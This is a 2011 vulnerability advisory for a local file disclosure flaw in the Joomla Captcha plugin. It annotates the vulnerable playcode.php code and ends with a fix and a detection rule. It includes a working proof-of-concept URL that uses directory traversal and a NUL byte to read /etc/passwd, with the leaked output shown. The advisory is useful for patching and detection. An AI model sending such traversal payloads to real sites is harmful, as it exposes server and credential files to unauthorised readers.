:::::::-.   ...    ::::::.    :::.
  ;;,   `';, ;;     ;;;`;;;;,  `;;;
  `[[     [[[['     [[[  [[[[[. '[[
   $$,    $$$$      $$$  $$$ "Y$c$$
   888_,o8P'88    .d888  888    Y88
   MMMMP"`   "YmmMMMM""  MMM     YM
 
  [ Discovered by dun \ posdub[at]gmail.com ]
 
#############################################################################
#  [ Joomla Captcha Plugin <= 4.5.1 ]  Local File Disclosure Vulnerability  #
#############################################################################
#
# Script: "Joomla Captcha plugin and patch for Joomla!"
#
# Script site: http://www.kupala.net/
# Download: http://code.google.com/p/joomla15captcha/
#
#
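# [LFI] (magic_quotes_gpc = Off)
#       The trailing %00 in the request below cuts off the '.<char>.mp3' suffix that [2] appends to 'lng'.
#       With magic_quotes_gpc = On the NUL byte is escaped and the truncation fails;
#       PHP 5.3.4 and later also reject NUL bytes in filesystem paths.
#       The target file is read and echoed, not executed, so the impact is disclosure ([4] LFD).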
# Vuln: http://site.com/plugins/system/captcha/playcode.php?lng=../../../../../../../etc/passwd%00
#       dun@radius ~ $ cat joomlacaptcha.mp3
#       root:x:0:0:root:/root:/bin/bash
#       ......
#
# File: ./plugins/system/captcha/playcode.php
#
#     79   if (!$captchacode) $captchacode = '0000000000';                                
#     80  
#     81   session_write_close();
#     82  
#     83   @$lng = $_GET['lng'];                                                 // [1]
#     84   if ( !$lng ) $lng = 'en-gb';
#     85  
#     86   $captchafilename = "joomlacaptcha.mp3";
#     87   $captchalength = strlen( $captchacode );
#     88  
#     89   $outlength = 0;
#     90   $reallength = 0;
#     91   $currsize = 0;
#     92   $outstream = '';
#     93  
#     94   if ($captchalength > 0) {
#     95       for ($i = 0; $i < $captchalength; $i++) {
#     96           $soundfiles[$i] = 'files/' . $lng . '.' . strtolower( substr( $captchacode, $i, 1 ) ) . '.mp3';   // [2]
#     97       }
#     98       foreach ($soundfiles as $onefile){                                     //
#     99           if (file_exists( $onefile )) {                                 //
#    100               $instream = fopen( $onefile, 'rb' );                   //
#    101               $currsize = filesize( $onefile );                      // [3]
#    102               $outstream .= fread( $instream, $currsize );           //
#    103               $outlength += $currsize;                               //
#    104               fclose( $instream );                                   //
#    105               $reallength += 1;                                      //
#    106           }
#    107       }
#    108   }
#    109  
#    110   if (($outstream == '') || ($captchalength != $reallength)) {
#    111           $outstream = 0; $outlength = 1;
#    112   }
#    113  
#    114   ob_start();
#    115   header( 'Content-Type: audio/x-mpeg');                                         //
#    116   header( "Content-Disposition: attachment; filename=$captchafilename;");        //
#    117   header( 'Content-Transfer-Encoding: binary');                                  //
#    118   header( 'Content-Length: '.$outlength);                                        //
#    119   echo $outstream ;                                                              // [4] LFD
#    120   ob_end_flush();
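#
# Markers:
#   [1] 'lng' is taken from the query string with no validation; '@' only hides the notice when it is absent.
#   [2] 'lng' is concatenated into a path under 'files/', so '../' sequences leave that directory.
#   [3] every resulting path that exists is opened and its full contents appended to $outstream.
#   [4] $outstream is sent to the client as the attachment joomlacaptcha.mp3, which is why the
#       downloaded "mp3" shown above contains /etc/passwd.
#
# Fix: accept 'lng' only if it is a plain language tag before the path is built at [2],
#      e.g. preg_match('/\A[a-z]{2}-[a-z]{2}\z/i', $lng), falling back to 'en-gb' otherwise,
#      or compare it against the list of language packs actually shipped in files/.
# Detection: requests to playcode.php whose 'lng' parameter contains '/', '..' or '%00'.
#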
# [ dun / 2011-01-09 ]